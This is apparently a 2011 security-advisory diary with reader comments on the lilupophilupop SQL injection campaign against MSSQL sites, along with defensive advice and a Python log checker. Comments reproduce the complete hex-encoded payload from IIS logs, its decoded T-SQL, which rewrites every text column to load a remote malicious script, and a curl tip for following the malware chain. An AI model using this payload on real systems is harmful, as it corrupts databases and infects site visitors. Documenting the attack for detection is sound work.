We've had several reports (thanks guys) of sites being injected with the following string: "></title><script src="hXXp://lilupophilupop. Typically it is inserted into several tables. From the information gathered so far it looks targeted at ASP, IIS and MSSQL backends, but that is just speculation. If you find that you have been infected please let us know, and if you can share packets or logs, please upload them via the contact form. Mark
UPDATE: Thanks to those that posted comments and those that worked behind the scenes. The injection string is along the lines Terry posted in his comments. The one I ran across is (note: not the whole string is provided):

73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404

Which decodes to:

declare+@s+varchar(4000)+set+@s=cast(0xset ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('------SNIP-------

When discovered yesterday about 80 sites showed in Google, this morning about 200, by lunch 1000 and a few minutes ago 4000+. Targets include ASP sites and Coldfusion (thanks Will). The attack seems to work on all versions of MSSQL. The hex will show in the IIS log files, so monitor those. Make sure that applications only have the access they require: if the page does not need to update a DB, use an account that can only read. Sources of the attack vary; it is automated and spreading fairly rapidly. As one of the comments mentioned, it looks like LizaMoon, which infected over 1,000,000 sites earlier this year. The trail of the files ends up on an "adobeflash page" or fake AV. Blocking access to the lilupophilupop site will prevent infection of clients should they hit an infected site and be redirected.

Mark H - Shearwater
Mark 391 Posts ISC Handler Dec 2nd 2011
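As an added example (not code from the diary or from any commenter), a small Python checker that applies the "monitor the IIS logs" advice above: it finds the cast(0x...) wrapper in the query-string field of an IIS W3C log entry, decodes the hex back into the T-SQL the server would hand to EXEC, and pulls out the literal the payload prepends to every text column, which is the string to search for in the database. The log line and the abbreviated payload it embeds are constructed for the example, and the field positions assume the default W3C layout seen in the entries posted in the comments.

```python
import re
import urllib.parse

# The cast(0x<hex>)/exec(@s) wrapper seen in the posted IIS entries (after URL-decoding).
HEX_EXEC = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+varchar", re.IGNORECASE)
# The literal the payload prepends to each column: SET [..]=''<marker>''+RTRIM(
MARKER = re.compile(r"SET \[[^\]]*\]=''(.*?)''\+RTRIM", re.DOTALL)
INDICATORS = ("information_schema", "cursor", "exec(", "<script")

# Constructed, abbreviated stand-in for the decoded payload posted on this page.
PAYLOAD_SQL = (
    "set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) "
    "DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME "
    "from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t "
    "WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']="
    "''\"></title><script src=\"http://lilupophilupop.com/sl.php\"></script><!--''"
    "+RTRIM(CONVERT(VARCHAR(6000),['+@C+']))') END CLOSE Table_Cursor"
)

def decode_hex_payload(hexstr):
    """Recover the T-SQL that CAST(0x... AS VARCHAR) hands to EXEC."""
    return bytes.fromhex(hexstr).decode("latin-1")

def analyse_iis_line(line):
    """None for a clean entry, else details of the injected SQL. Assumes the
    default W3C field order of the posted entries (cs-uri-query at index 6,
    c-ip at index 9 when split on spaces)."""
    fields = line.split(" ")
    if len(fields) < 10:
        return None
    query = urllib.parse.unquote_plus(fields[6])
    m = HEX_EXEC.search(query)
    if not m:
        return None
    sql = decode_hex_payload(m.group(1))
    low = sql.lower()
    marker = MARKER.search(sql)
    return {
        "client_ip": fields[9],
        "decoded_sql": sql,
        "indicators": [k for k in INDICATORS if k in low],
        "injected_marker": marker.group(1) if marker else None,
    }

def make_sample_log_line(sql):
    """Constructed IIS entry with the payload wrapped as in the posted logs."""
    wrapped = ("id=122 declare @s varchar(4000) set @s=cast(0x%s as varchar(4000)) "
               "exec(@s)--" % sql.encode("latin-1").hex())
    return ("2011-12-01 17:12:08 W3SVC1 10.0.0.5 GET /page.asp %s 80 - 203.0.113.9 "
            "Mozilla/4.0 200 0 0" % urllib.parse.quote_plus(wrapped))
```

Run `analyse_iis_line` over each line of a real IIS log and alert on any non-None result; the returned `injected_marker` is what to grep for in the affected text columns.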
Reminds me of LizaMoon...inject a stored XSS into the webapp's backend db...

Anonymous
Dec 1st 2011
For those who want to use curl to play follow the bouncing malware, set the user agent string to a value used by a common browser, i.e. --user-agent 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'
If you don't do this, a 404 response is returned, but if the client looks like an ordinary browser, it will return a 200 response with a javascript redirect in the body. It looks like the bad guys may be tracking repeat visits from the same IP address since subsequent requests even with a common user agent receive a 200 OK header response, but there is no content. The interesting stuff appears to be at hxxp://www2.thebestbesentinel.rr.nu but that's as far as I've tracked it.

James 12 Posts
Dec 2nd 2011
We were hit by this; here is the payload from IIS logs:
2011-12-01 17:12:08 W3SVC1505444441 OURIP GET /VALIDPAGE VALIDPARAM=0&VALIDPARAM=122+declare+%40s+varchar%284000%29+set+%40s%3Dcast%280x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e333020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f6c696c75706f7068696c75706f702e636f6d2f736c2e706870223e3c2f7363726970743e3c212d2d27272b525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d2929207768657265204c45465428525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d29292c3137293c3e2727223e3c2f7469746c653e3c7363726970742727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar%284000%29%29+exec%28%40s%29-- 80 - 78.46.28.97 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0) 200 0 0

set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>30 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=''"></title><script src="http://lilupophilupop.com/sl.php"></script><!--''+RTRIM(CONVERT(VARCHAR(6000),['+@C+'])) where LEFT(RTRIM(CONVERT(VARCHAR(6000),['+@C+'])),17)<>''"></title><script'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

James 1 Posts
Dec 2nd 2011
Yes, same here, the hex code in the access logs was
73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e333020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f6c696c75706f7068696c75706f702e636f6d2f736c2e706870223e3c2f7363726970743e3c212d2d27272b525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d2929207768657265204c45465428525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d29292c3137293c3e2727223e3c2f7469746c653e3c7363726970742727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72

James 2 Posts
Dec 2nd 2011
The IP address it came from was:
96.9.149.76 - - [30/Nov/2011:15:42:17 -0500]

James 2 Posts
Dec 2nd 2011
It's a SQL Server exploit, not dependent on ASP and possibly not IIS either. It hit us and we're running Coldfusion.

James 1 Posts
Dec 2nd 2011
Thanks Will, I updated the diary.

Mark 391 Posts ISC Handler
Dec 2nd 2011
We got hit from IP 78.46.28.97 @ around 21:14 UTC yesterday - looks like the same hex dump - if you want the entire entry from the IIS log I can post - the hex dump you provided helped us find this attack vector in our logs to explain the symptoms we dealt with late yesterday - thank you!

Mark 1 Posts
Dec 2nd 2011
Thanks for working on this guys...for those of us that aren't quite as clever, can you explain for the layperson how this attack happened and what, if anything, we can do to prevent it happening again?
We got hit first time on Friday morning (Australia time). I spent most of yesterday fixing what I could, and now we've been hit again, but in different tables. Thanks.

Mark 2 Posts
Dec 2nd 2011
There is an article I was reading just 10 minutes ago that describes the way the payload works:
http://blog.strictly-software.com/2009/10/two-stage-sql-injection-attack.html

Mark 1 Posts
Dec 2nd 2011
Wouldn't proper sanitization of input from the page prevent this from occurring?

bkendall 7 Posts
Dec 2nd 2011
I see hits in our content filter touching the sl.php url back to 11/30.

Anonymous
Dec 2nd 2011
See: http://blog.dynamoo.com/2010/10/evil-network-specialist-ltd-specialist.html
11 October 2010 - "...blocking 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) is probably a good idea..."

Jack 160 Posts
Dec 2nd 2011
So, this script destroys data on our SQL servers, but is not leaving any back doors open, right? Find the sloppy code and clean it up and it shouldn't happen again?

Jack 2 Posts
Dec 2nd 2011
If you are a member of AUSCert they can help you find out the extent of the intrusion and how to proceed. But to answer your question, yes, it is probably bad code somewhere. Try something like burpsuite to help you run a scan of your site. It won't find everything but should pick up on the issues that things like this worm exploit.

Raymond 14 Posts
Dec 3rd 2011
A preliminary fix: revoke select permissions from the SQL login your web code uses on information_schema views (and probably also sysobjects, syscolumns in vulnerable DBs). Not airtight, but it makes this kind of attack more difficult to execute.

Raymond 1 Posts
Dec 3rd 2011
Anyone have any transaction logs? Let's figure out the insert/exec code that is being used. That's where we'll figure out how this whole thing works.

Raymond 1 Posts
Dec 4th 2011
See: Diagnostic page for AS:48691 (SPECIALIST)
- http://google.com/safebrowsing/diagnostic?site=AS:48691 "... The last time Google tested a site on this network was on 2011-12-04, and the last time suspicious content was found was on 2011-12-04... Over the past 90 days, we found 11 site(s) on this network, including, for example, lilupophilupop .com... that appeared to function as intermediaries for the infection of 6 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 1 site(s), including, for example, sweepstakesandcontestsnow .com... that infected 108 other site(s)..." [ 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) ]

Jack 160 Posts
Dec 4th 2011
2011-12-01 21:41:37
... ID=364+declare+%40s+varchar%284000%29+set+%40s%3Dcast%...%284000%29%29+exec%28%40s%29--&allcount=715&dbeg=141|-|ASP_0113|Script_timed_out 80 - 78.46.28.97 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0) 500 0 0

Jack 1 Posts
Dec 6th 2011
Does the title mean that there are ATMs running Windows OS that are under attack from this SQL injection?

Jack 1 Posts
Dec 6th 2011